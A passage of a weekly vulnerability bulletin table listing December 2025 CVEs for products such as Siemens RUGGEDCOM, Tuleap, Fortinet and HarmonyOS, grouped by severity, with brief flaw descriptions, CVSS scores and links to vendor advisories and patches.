| Siemens--RUGGEDCOM RMC8388 V5.X | A vulnerability has been identified in RUGGEDCOM RMC8388 V5.X (All versions < V5.10.1), RUGGEDCOM RS416Pv2 V5.X (All versions < V5.10.1), RUGGEDCOM RS416v2 V5.X (All versions < V5.10.1), RUGGEDCOM RS900 (32M) V5.X (All versions < V5.10.1), RUGGEDCOM RS900G (32M) V5.X (All versions < V5.10.1), RUGGEDCOM RSG2100 (32M) V5.X (All versions < V5.10.1), RUGGEDCOM RSG2100P (32M) V5.X (All versions < V5.10.1), RUGGEDCOM RSG2288 V5.X (All versions < V5.10.1), RUGGEDCOM RSG2300 V5.X (All versions < V5.10.1), RUGGEDCOM RSG2300P V5.X (All versions < V5.10.1), RUGGEDCOM RSG2488 V5.X (All versions < V5.10.1), RUGGEDCOM RSG907R (All versions < V5.10.1), RUGGEDCOM RSG908C (All versions < V5.10.1), RUGGEDCOM RSG909R (All versions < V5.10.1), RUGGEDCOM RSG910C (All versions < V5.10.1), RUGGEDCOM RSG920P V5.X (All versions < V5.10.1), RUGGEDCOM RSL910 (All versions < V5.10.1), RUGGEDCOM RST2228 (All versions < V5.10.1), RUGGEDCOM RST2228P (All versions < V5.10.1), RUGGEDCOM RST916C (All versions < V5.10.1), RUGGEDCOM RST916P (All versions < V5.10.1). Affected devices do not properly validate input during the TLS certificate upload process of the web service. This could allow an authenticated remote attacker to trigger a device crash and reboot, leading to a temporary Denial of Service on the device. | 2025-12-09 | 4.3 | CVE-2025-40935 | https://cert-portal.siemens.com/productcert/html/ssa-763474.html |
| Siemens--SIMATIC CN 4100 | A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected device contains a USB port which allows unauthenticated connections. This could allow an attacker with physical access to the device to trigger reboot that could cause denial of service condition. | 2025-12-09 | 4.6 | CVE-2025-40939 | https://cert-portal.siemens.com/productcert/html/ssa-416652.html |
| Siemens--SIMATIC CN 4100 | A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application exhibits inconsistent SNMP behavior, such as unexpected service availability and unreliable configuration handling across protocol versions. This could allow an attacker to access sensitive data, potentially leading to a breach of confidentiality. | 2025-12-09 | 4.9 | CVE-2025-40940 | https://cert-portal.siemens.com/productcert/html/ssa-416652.html |
| Siemens--SIMATIC CN 4100 | A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected devices exposes server information in its responses. This could allow an attacker with network access to gain useful information, increasing the likelihood of targeted attacks. | 2025-12-09 | 4.3 | CVE-2025-40941 | https://cert-portal.siemens.com/productcert/html/ssa-416652.html |
| Phoenix Contact--FL SWITCH 2005 | A low privileged remote attacker can use the ssh feature to execute commands directly after login. The process stays open and uses resources which leads to a reduced performance of the management functions. Switching functionality is not affected. | 2025-12-09 | 4.3 | CVE-2025-41693 | https://certvde.com/de/advisories/VDE-2025-071 |
| Phoenix Contact--FL SWITCH 2005 | An attacker can use an undocumented UART port on the PCB as a side-channel with the user hardcoded credentials obtained from CVE-2025-41692 to gain read access to parts of the filesystem of the device. | 2025-12-09 | 4.6 | CVE-2025-41696 | https://certvde.com/de/advisories/VDE-2025-071 |
| TeamViewer--DEX | A vulnerability in TeamViewer DEX Client (former 1E Client) - Content Distribution Service (NomadBranch.exe) prior version 25.11 for Windows allows malicious actors to coerce the service into transmitting data to an arbitrary internal IP address, potentially leaking sensitive information. | 2025-12-11 | 4.3 | CVE-2025-46266 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1005/ |
| Huawei--HarmonyOS | Permission control vulnerability in the media library module. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-12-08 | 4.4 | CVE-2025-58279 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Fortinet--FortiWeb | A use of password hash instead of password for authentication vulnerability [CWE-836] vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4.0 through 7.4.10, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an unauthenticated attacker to use the hash in place of the password to authenticate via crafted HTTP/HTTPS requests | 2025-12-09 | 4.4 | CVE-2025-64471 | https://fortiguard.fortinet.com/psirt/FG-IR-25-984 |
| Enalean--tuleap | Tuleap is an Open Source Suite for management of software development and collaboration. Tuleap Community Edition versions below 17.0.99.1762444754 and Tuleap Enterprise Edition versions prior to 17.0-2, 16.13-7 and 16.12-10 allow attackers trick victims into changing tracker general settings. This issue is fixed in version Tuleap Community Edition version 17.0.99.1762444754 and Tuleap Enterprise Edition versions 17.0-2, 16.13-7 and 16.12-10. | 2025-12-08 | 4.6 | CVE-2025-64498 | https://github.com/Enalean/tuleap/security/advisories/GHSA-vxfh-h8p6-p5rg https://github.com/Enalean/tuleap/commit/993316dd6a291bb3937cb7a4571eaab0e7d55370 https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=993316dd6a291bb3937cb7a4571eaab0e7d55370 https://tuleap.net/plugins/tracker/?aid=45593 |
| Enalean--tuleap | Tuleap is a free and open source suite for management of software development and collaboration. Tuleap Community Editon versions prior to 17.0.99.1762456922 and Tuleap Enterprise Edition versions prior to 17.0-2, 16.13-7 and 16.12-10 are vulnerable to CSRF attacks through planning management API. Attackers have access to create, edit or remove plans. This issue is fixed in Tuleap Community Edition version 17.0.99.1762456922 and Tuleap Enterprise Edtion versions 17.0-2, 16.13-7 and 16.12-10. | 2025-12-08 | 4.6 | CVE-2025-64499 | https://github.com/Enalean/tuleap/security/advisories/GHSA-9h47-jg7r-ww7x https://github.com/Enalean/tuleap/commit/1734a7bb2964042310ddc3f6dd7b4c82eee27526 https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=1734a7bb2964042310ddc3f6dd7b4c82eee27526 https://tuleap.net/plugins/tracker/?aid=45592 |
| Enalean--tuleap | Tuleap is a free and open source suite for management of software development and collaboration. Versions of Tuleap Community Edition prior to 17.0.99.1763126988 and Tuleap Enterprise Edition prior to 17.0-3 and 16.13-8 have missing CSRF protections which allow attackers to create or remove tracker triggers. This issue is fixed in Tuleap Community Edition version 17.0.99.1763126988 and Tuleap Enterprise Edition versions 17.0-3 and 16.13-8. | 2025-12-08 | 4.6 | CVE-2025-64760 | https://github.com/Enalean/tuleap/security/advisories/GHSA-f2xv-x3g6-4j9p https://github.com/Enalean/tuleap/commit/71d427b0f7ed8fa269a5ee6f7a557cf3dfc99cd4 https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=71d427b0f7ed8fa269a5ee6f7a557cf3dfc99cd4 https://tuleap.net/plugins/tracker/?aid=45618 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 4.8 | CVE-2025-64872 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Insufficiently Protected Credentials vulnerability that could result in limited unauthorized write access. An attacker could leverage this vulnerability to gain unauthorized access by exploiting improperly stored or transmitted credentials. Exploitation of this issue does not require user interaction. | 2025-12-09 | 4.3 | CVE-2025-64898 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Enalean--tuleap | Tuleap is a free and open source suite for management of software development and collaboration. Versions of Tuleap Community Edition prior to 17.0.99.1763803709 and Tuleap Enterprise Edition versions prior to 17.0-4 and 16.13-9 are mission CSRF protections in its tracker field dependencies, allowing attackers to modify tracker fields. This issue is fixed in Tuleap Community Edition version 17.0.99.1763803709 and Tuleap Enterprise Edition versions 17.0-4 and 16.13-9. | 2025-12-08 | 4.6 | CVE-2025-65962 | https://github.com/Enalean/tuleap/security/advisories/GHSA-9hgc-cm68-rrgc https://github.com/Enalean/tuleap/commit/26678c5b411042e68964b199bf88a44607550633 https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=26678c5b411042e68964b199bf88a44607550633 https://tuleap.net/plugins/tracker/?aid=45632 |
| Huawei--HarmonyOS | Permission control vulnerability in the window management module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 4 | CVE-2025-66329 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | App lock verification bypass vulnerability in the file management app. Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-12-08 | 4.9 | CVE-2025-66330 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| umbraco--Umbraco-CMS | Umbraco is an ASP.NET CMS. Due to unsafe handling and deletion of temporary files in versions 10.0.0 through 13.12.0, during the dictionary upload process an attacker with access to the backoffice can trigger predictable requests to temporary file paths. The application's error responses (HTTP 500 when a file exists, 404 when it does not) allow the attacker to enumerate the existence of arbitrary files on the server's filesystem. This vulnerability does not allow reading or writing file contents. In certain configurations, incomplete clean-up of temporary upload files may additionally expose the NTLM hash of the Windows account running the Umbraco application. This issue is fixed in version 13.12.1. | 2025-12-09 | 4.9 | CVE-2025-66625 | https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-hfv2-pf68-m33x https://github.com/umbraco/Umbraco-CMS/commit/7505efd433189037f46547932d4a8b603fd4a615 |
| LabRedesCefetRJ--WeGIA | WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. Versions 3.5.4 and below contain a Stored Cross-Site Scripting (XSS) vulnerability in the /WeGIA/html/geral/configurar_senhas.php endpoint. The application does not sanitize user-controlled data before rendering it inside the employee selection dropdown. The application retrieves employee names from the database and injects them directly into HTML <option> elements without proper escaping. This issue is fixed in version 3.5.5. | 2025-12-09 | 4.3 | CVE-2025-67496 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-9843-qm67-73h2 https://github.com/LabRedesCefetRJ/WeGIA/commit/c80b8cacd310fd459df61c030fb267c5e68cafc7 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.5.5 |
| CISA--Software Acquisition Guide Tool | The CISA Software Acquisition Guide Supplier Response Web Tool before 2025-12-11 was vulnerable to cross-site scripting via text fields. If an attacker could convince a user to import a specially-crafted JSON file, the Tool would load JavaScript from the file into the page. The JavaScript would execute in the context of the user's browser when the user submits the page (clicks 'Next'). | 2025-12-12 | 4.4 | CVE-2025-67634 | url url url |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11 stored XSS was possible via session attribute | 2025-12-11 | 4.8 | CVE-2025-67741 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| SpaceX--Starlink Dish | SpaceX Starlink Dish devices with firmware 2024.12.04.mr46620 (e.g., on Mini1_prod2) allow administrative actions via unauthenticated LAN gRPC requests, aka MARMALADE 2. The cross-origin policy can be bypassed by omitting a Referer header. In some cases, an attacker's ability to read tilt, rotation, and elevation data via gRPC can make it easier to infer the geographical location of the dish. | 2025-12-11 | 4.2 | CVE-2025-67780 | https://www.akawlabs.com/blog/starlink-grpc-execution |
| MJML--MJML | MJML through 4.18.0 allows mj-include directory traversal to test file existence and (in the type="css" case) read files. NOTE: this issue exists because of an incomplete fix for CVE-2020-12827. | 2025-12-14 | 4.5 | CVE-2025-67898 | https://github.com/mjmlio/mjml/issues/3018 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| emrevona--WP Fastest Cache | The WP Fastest Cache plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.7.4 via the 'get_server_time_ajax_request' AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-12-12 | 3.5 | CVE-2025-10583 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b9e64c54-a78f-454a-a9ee-02f64b6ae83d?source=cve https://research.cleantalk.org/2025-10583 https://www.wpfastestcache.com/changelog/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.6 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to leak sensitive information from specifically crafted merge request titles. | 2025-12-11 | 3.5 | CVE-2025-12734 | GitLab Issue #579573 HackerOne Bug Bounty Report #3379381 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| TAC Information Services Internal and External Trade Inc.--GoldenHorn | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TAC Information Services Internal and External Trade Inc. GoldenHorn allows Cross-Site Scripting (XSS). This issue affects GoldenHorn: before 4.25.1121.1. | 2025-12-10 | 3.5 | CVE-2025-13127 | https://www.usom.gov.tr/bildirim/tr-25-0441 |
| SourceCodester--Online Banking System | A vulnerability was detected in SourceCodester Online Banking System 1.0. This impacts an unknown function of the file /?page=user. The manipulation of the argument First Name/Last Name results in cross site scripting. The attack can be launched remotely. The exploit is now public and may be used. | 2025-12-08 | 3.5 | CVE-2025-14221 | VDB-334663 | SourceCodester Online Banking System page cross site scripting VDB-334663 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701624 | SourceCodester Online Banking System July 14, 2021 - 17:13 Cross Site Scripting https://mega.nz/file/T4hjCagS#87U1JgRHZWzXW2HTpBIG-H9dJ_w9kUERmaaQqJyB5_Q https://www.sourcecodester.com/ |
| Yealink--SIP-T21P E2 | A weakness has been identified in Yealink SIP-T21P E2 52.84.0.15. Impacted is an unknown function of the component Local Directory Page. This manipulation causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-08 | 3.5 | CVE-2025-14228 | VDB-334670 | Yealink SIP-T21P E2 Local Directory cross site scripting VDB-334670 | CTI Indicators (IOB, IOC, TTP) Submit #701949 | Yealink T21P_2E 52.84.0.15 Cross Site Scripting https://drive.google.com/file/d/1vptRtEeoS1AZgnqow1yPrsgsBkw4jXc2/view?usp=sharing |
| baowzh--hfly | A security flaw has been discovered in baowzh hfly up to 638ff9abe9078bc977c132b37acbe1900b63491c. This issue affects some unknown processing of the file /admin/index.php/advtext/add of the component advtext Module. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit has been released to the public and may be exploited. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 3.5 | CVE-2025-14519 | VDB-335857 | baowzh hfly advtext add cross site scripting VDB-335857 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702943 | GitHub hfly 1.0 Stored Cross-Site Scripting https://github.com/Xor-Gerke/webray.com.cn/blob/main/cve/PHP-based%20travel%20website-CMS/PHP-based%20travel%20website-CMS%20advtext%20add%20Stored%20Cross-Site%20Scripting(XSS).md |
| yangshare--warehouseManager | A security vulnerability has been detected in yangshare warehouseManager 仓库管理系统 1.1.0. This affects the function addCustomer of the file CustomerManageHandler.java. Such manipulation of the argument Name leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-12-11 | 3.5 | CVE-2025-14538 | VDB-335877 | yangshare warehouseManager 仓库管理系统 CustomerManageHandler.java addCustomer cross site scripting VDB-335877 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703736 | gitee WarehouseManager v1.1.0 - Remove CAPTCHA Improper Neutralization of Alternate XSS Syntax https://gitee.com/yangshare/warehouseManager/issues/ID9NAU |
| n/a--Qualitor | A security vulnerability has been detected in Qualitor up to 8.24.73. The impacted element is an unknown function of the file /Qualitor/html/bc/bcdocumento9/biblioteca/request/viewDocumento.php. Such manipulation of the argument cdscript leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. It is suggested to upgrade the affected component. The vendor confirms the existence of the issue: "We became aware of the issue through an earlier direct notification from the original reporter, and our engineering team promptly investigated and implemented the necessary corrective measures. (...) Updated versions containing the fix have already been provided to our customer base". | 2025-12-12 | 3.5 | CVE-2025-14580 | VDB-336201 | Qualitor viewDocumento.php cross site scripting VDB-336201 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705193 | Qualitor 8.20.77 - 8.24.73 Cross Site Scripting |
| Tenda--AX9 | A security flaw has been discovered in Tenda AX9 22.03.01.46. This affects the function image_check of the component httpd. The manipulation results in use of weak hash. It is possible to launch the attack remotely. A high complexity level is associated with this attack. It is indicated that the exploitability is difficult. The exploit has been released to the public and may be exploited. | 2025-12-13 | 3.7 | CVE-2025-14636 | VDB-336361 | Tenda AX9 httpd image_check weak hash VDB-336361 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707213 | Tenda AX9 V22.03.01.46 CWE-327 Use of a Broken or Risky Cryptographic Algorithm https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Tenda/AX9_Inte.md https://www.tenda.com.cn/ |
| MartialBE--one-hub | A vulnerability has been found in MartialBE one-hub up to 0.14.27. This vulnerability affects unknown code of the file docker-compose.yml. The manipulation of the argument SESSION_SECRET leads to use of hard-coded cryptographic key . The attack may be initiated remotely. The complexity of an attack is rather high. It is stated that the exploitability is difficult. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. The code maintainer recommends (translated from Chinese): "The default docker-compose example file is not recommended for production use. If you intend to use it in production, please carefully check and modify every configuration and environment variable yourself!" | 2025-12-14 | 3.7 | CVE-2025-14651 | VDB-336384 | MartialBE one-hub docker-compose.yml hard-coded key VDB-336384 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710249 | https://github.com/MartialBE https://github.com/MartialBE/one-hub ≤ v0.14.27 Authentication Bypass by Primary Weakness https://github.com/MartialBE/one-hub/issues/872 https://github.com/MartialBE/one-hub/issues/872#issuecomment-3616033169 https://github.com/MartialBE/one-hub/blob/main/docker-compose.yml#L15C24-L15C38 |
| Siemens--SINEMA Remote Connect Server | A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V3.2 SP4). Affected applications contain private SSL/TLS keys on the server that are not properly protected allowing any user with server access to read these keys. This could allow an authenticated attacker to impersonate the server potentially enabling man-in-the-middle, traffic decryption or unauthorized access to services that trust these certificates. | 2025-12-09 | 3.3 | CVE-2025-40818 | https://cert-portal.siemens.com/productcert/html/ssa-626856.html |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an Improper Verification of Cryptographic Signature vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to gain limited unauthorized write access. Exploitation of this issue does not require user interaction. | 2025-12-09 | 3.3 | CVE-2025-64786 | https://helpx.adobe.com/security/products/acrobat/apsb25-119.html |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an Improper Verification of Cryptographic Signature vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass cryptographic protections and gain limited unauthorized write access. Exploitation of this issue does not require user interaction. | 2025-12-09 | 3.3 | CVE-2025-64787 | https://helpx.adobe.com/security/products/acrobat/apsb25-119.html |
| Huawei--HarmonyOS | Denial of service (DoS) vulnerability in the office service. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 3.3 | CVE-2025-66331 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Denial of service (DoS) vulnerability in the office service. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 3.3 | CVE-2025-66332 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Denial of service (DoS) vulnerability in the office service. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 3.3 | CVE-2025-66333 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Denial of service (DoS) vulnerability in the office service. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 3.3 | CVE-2025-66334 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Versions 4.2.27 and prior, 4.3.0-beta.1 through 4.3.14, 4.4.0-beta.1 through 4.4.9, 4.5.0-beta.1 through 4.5.2 have discrepancies in error handling which allow checking whether a given status exists by sending a request with a non-English Accept-Language header. Using this behavior, an attacker who knows the identifier of a particular status they are not allowed to see can confirm whether this status exists or not. This cannot be used to learn the contents of the status or any other property besides its existence. This issue is fixed in versions 4.2.28, 4.3.15, 4.4.10 and 4.5.3. | 2025-12-09 | 3.7 | CVE-2025-67500 | https://github.com/mastodon/mastodon/security/advisories/GHSA-gwhw-gcjx-72v8 https://github.com/mastodon/mastodon/pull/37077/commits/9957d3218cb33fea6a44bb285e2ba4795a059e4f |
| Telepedia--TableProgressTracking | TableProgressTracking is a MediaWiki extension to track progress against specific criterion. Versions 1.2.0 and below do not enforce CSRF token validation in the REST API. As a result, an attacker could craft a malicious webpage that, when visited by an authenticated user on a wiki with the extension enabled, would trigger unintended authenticated actions through the victim's browser. Due to the lack of token validation, an attacker can delete or track progress against tables. This issue is patched in version 1.2.1 of the extension. | 2025-12-10 | 3.5 | CVE-2025-67646 | https://github.com/Telepedia/TableProgressTracking/security/advisories/GHSA-j24f-hw6w-cq78 https://github.com/Telepedia/TableProgressTracking/commit/e2aa8c4b3bb78989c6fe39070a95a26d22b91c94 |
| AzuraCast--AzuraCast | AzuraCast is a self-hosted, all-in-one web radio management suite. Versions 0.23.1 mistakenly include an API endpoint that is intended for internal use by the SFTP software sftpgo, exposing it to the public-facing HTTP API for AzuraCast installations. A user with specific internal knowledge of a station's operations can craft a custom HTTP request that would affect the contents of a station's database, without revealing any internal information about the station. In order to carry out an attack, a malicious user would need to know a valid SFTP station username and the coordinating internal filesystem structure. This issue is fixed in version 0.23.2. | 2025-12-12 | 3.1 | CVE-2025-67737 | https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-9449-rphm-mjqr https://github.com/AzuraCast/AzuraCast/commit/34620dbad93f6cd8e209a4220e3e53c7c5fea844 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11.2 improper repository URL validation could lead to local paths disclosure | 2025-12-11 | 3.1 | CVE-2025-67739 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11 path traversal was possible via file upload | 2025-12-11 | 3.8 | CVE-2025-67742 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| rtcamp--rtMedia for WordPress, BuddyPress and bbPress | The rtMedia for WordPress, BuddyPress and bbPress plugin for WordPress is vulnerable to to Information Disclosure due to missing authorization in the handle_rest_pre_dispatch() function when the Godam plugin is active, in versions 4.7.0 to 4.7.3. This makes it possible for unauthenticated attackers to retrieve media items associated with draft or private posts. | 2025-12-13 | 3.7 | CVE-2025-9218 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68533b4c-1bdf-4104-a263-757b018af129?source=cve https://wordpress.org/plugins/buddypress-media/#developers https://plugins.trac.wordpress.org/changeset/3386907/buddypress-media/tags/4.7.4/app/main/controllers/api/RTMediaJsonApi.php |
| IBM--IBM QRadar SIEM | IBM QRadar SIEM 7.5 - 7.5.0 UP14 IF01 is affected by an information disclosure vulnerability involving exposure of directory information. IBM has addressed this vulnerability in the latest update. | 2025-12-09 | 2.7 | CVE-2024-56464 | https://www.ibm.com/support/pages/node/7253664 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak Admin REST (Representational State Transfer) API. This vulnerability allows information disclosure of sensitive role metadata via insufficient authorization checks on the /admin/realms/{realm}/roles endpoint. | 2025-12-10 | 2.7 | CVE-2025-14082 | https://access.redhat.com/security/cve/CVE-2025-14082 RHBZ#2419078 |
| n/a--GreenCMS | A flaw has been found in GreenCMS 2.3.0603. Affected by this issue is some unknown functionality of the file /Admin/Controller/CustomController.class.php of the component Menu Management Page. This manipulation of the argument Link causes cross site scripting. The attack may be initiated remotely. The exploit has been published and may be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-08 | 2.4 | CVE-2025-14244 | VDB-334754 | GreenCMS Menu Management CustomController.class.php cross site scripting VDB-334754 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702435 | GreenCMS 2.3.0603 CWE-79 - Cross-site Scripting https://gist.github.com/b1uel0n3/83f9965b3499a2abfee30c77458f718a |
| code-projects--Student File Management System | A vulnerability was found in code-projects Student File Management System 1.0. This affects an unknown part of the file /admin/update_user.php of the component Update User Page. Performing manipulation results in cross site scripting. The attack may be initiated remotely. The exploit has been made public and could be used. | 2025-12-14 | 2.4 | CVE-2025-14662 | VDB-336394 | code-projects Student File Management System Update User update_user.php cross site scripting VDB-336394 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #713873 | Code-projects Student File Management System v1.0 Stored XSS vulnerability https://github.com/jjjjj-zr/jjjjjzr15/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A vulnerability was determined in code-projects Student File Management System 1.0. This vulnerability affects unknown code of the file /admin/update_student.php. Executing manipulation can lead to cross site scripting. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-14 | 2.4 | CVE-2025-14663 | VDB-336395 | code-projects Student File Management System update_student.php cross site scripting VDB-336395 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #714018 | Code-projects Student File Management System v1.0 Stored XSS vulnerability https://github.com/jjjjj-zr/jjjjjzr16/issues/1 https://code-projects.org/ |
| IBM--Controller | IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 could allow a privileged user to bypass validation, passing user input into the application as trusted data, due to client-side enforcement of server-side security. | 2025-12-08 | 2.7 | CVE-2025-36102 | https://www.ibm.com/support/pages/node/7253273 |
| Fortinet--FortiAuthenticator | A direct request ('forced browsing') vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least sponsor permissions to read and download device logs via accessing specific endpoints | 2025-12-09 | 2.6 | CVE-2025-57823 | https://fortiguard.fortinet.com/psirt/FG-IR-25-554 |
| Fortinet--FortiAuthenticator | An improper access control vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least read-only admin permission to obtain the credentials of other administrators' messaging services via crafted requests. | 2025-12-09 | 2.6 | CVE-2025-59923 | https://fortiguard.fortinet.com/psirt/FG-IR-25-616 |
| JetBrains--TeamCity | In JetBrains TeamCity before 2025.11 improper access control could expose GitHub App token's metadata | 2025-12-11 | 2.7 | CVE-2025-67740 | https://www.jetbrains.com/privacy-security/issues-fixed/ |
| uriparser project--uriparser | uriparser through 0.9.9 allows unbounded recursion and stack consumption, as demonstrated by ParseMustBeSegmentNzNc with large input containing many commas. | 2025-12-14 | 2.9 | CVE-2025-67899 | https://github.com/uriparser/uriparser/issues/282 https://github.com/uriparser/uriparser/pull/284 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| MIYAGAWA--Plack::Middleware::Session | Plack-Middleware-Session versions before 0.17 may be vulnerable to HMAC comparison timing attacks | 2025-12-09 | not yet calculated | CVE-2013-10031 | https://github.com/plack/Plack-Middleware-Session/commit/b7f0252269ba1bb812b5dc02303754fe94c808e4 |
| SpenetiX AG--Fusion Digital Signage | SpinetiX Fusion Digital Signage 3.4.8 and lower contains an authenticated path traversal vulnerability that allows attackers to manipulate file backup and deletion operations through unverified input parameters. Attackers can exploit path traversal techniques in index.php to write backup files to arbitrary locations and delete files by manipulating backup and file delete requests. | 2025-12-10 | not yet calculated | CVE-2020-36883 | ExploitDB-48844 Official Product Homepage Zero Science Lab Disclosure ZSL-2020-5594 Mbed TLS GitHub Repository VulnCheck Advisory: SpinetiX Fusion Digital Signage 3.4.8 Authenticated Path Traversal via File Operations |
| BrightSign, LLC--BrightSign Digital Signage Diagnostic Web Server | BrightSign Digital Signage Diagnostic Web Server 8.2.26 and less contains an unauthenticated server-side request forgery vulnerability in the 'url' GET parameter of the Download Speed Test service. Attackers can specify external domains to bypass firewalls and perform network enumeration by forcing the application to make arbitrary HTTP requests to internal network hosts. | 2025-12-10 | not yet calculated | CVE-2020-36884 | ExploitDB-48843 BrightSign Homepage Zero Science Lab Disclosure Zero Science GitHub Repository VulnCheck Advisory: BrightSign Digital Signage Diagnostic Web Server 8.2.26 Unauthenticated SSRF |
| Sony Electronics Inc.--IPELA Network Camera | Sony IPELA Network Camera 1.82.01 contains a stack buffer overflow vulnerability in the ftpclient.cgi endpoint that allows remote attackers to execute arbitrary code. Attackers can exploit the vulnerability by sending a crafted POST request with oversized data to the FTP client functionality, potentially causing remote code execution or denial of service. | 2025-12-10 | not yet calculated | CVE-2020-36885 | ExploitDB-48842 Fixed in 1.88.0.0 Zero Science Lab Disclosure Product web page VulnCheck Advisory: Sony IPELA Network Camera 1.82.01 Remote Stack Buffer Overflow via ftpclient.cgi |
| SpenetiX AG--Fusion Digital Signage | SpinetiX Fusion Digital Signage 3.4.8 contains a cross-site request forgery vulnerability that allows attackers to create administrative user accounts without proper request validation. Attackers can craft a malicious web page that automatically submits a form to create a new admin user with full system privileges when a logged-in user visits the page. | 2025-12-10 | not yet calculated | CVE-2020-36886 | ExploitDB-48846 Official Product Homepage Zero Science Lab Disclosure ZSL-2020-5592 Product Homepage VulnCheck Advisory: SpinetiX Fusion Digital Signage 3.4.8 Cross-Site Request Forgery via User Creation |
